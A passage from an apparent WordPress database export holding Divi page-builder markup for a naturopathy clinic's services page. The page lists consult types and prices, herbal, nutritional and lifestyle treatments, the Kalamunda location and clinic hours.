herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up (30 min) - $95 ($105 from 1/7/26) \" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" width=\"100%\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express (20 min) - $70\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span> Existing clients only.[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" min_height=\"425px\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset2\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span>\nCapsules/tablets\nTeas\nTopical creams[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Stress strategies</span><br /><span style=\"font-family: Montserrat;\">Exercise and movement</span><br /><span style=\"font-family: Montserrat;\">Mindfulness </span><br /><span style=\"font-family: Montserrat;\">Sleep hygiene</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" parallax=\"on\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9am-4pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 11am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Services','','inherit','closed','closed','','424-revision-v1','','','2026-02-19 13:18:41','2026-02-19 05:18:41','',424,'https://verdenaturopathy.com.au/?p=514',0,'revision','',0),(513,1,'2026-02-19 13:18:12','2026-02-19 05:18:12','[et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" overflow-x=\"hidden\" overflow-y=\"hidden\" custom_padding=\"||0px|||\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Naturopathic consults</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset2\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial (60 min) - $215\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A close look into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up (30 min) - $95 ($105 from 1/7/26) \" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" width=\"100%\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express (20 min) - $70\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span> Existing clients only.[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" min_height=\"425px\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset2\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span>\nCapsules/tablets\nTeas\nTopical creams[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Stress strategies</span><br /><span style=\"font-family: Montserrat;\">Exercise and movement</span><br /><span style=\"font-family: Montserrat;\">Mindfulness </span><br /><span style=\"font-family: Montserrat;\">Sleep hygiene</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" parallax=\"on\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: 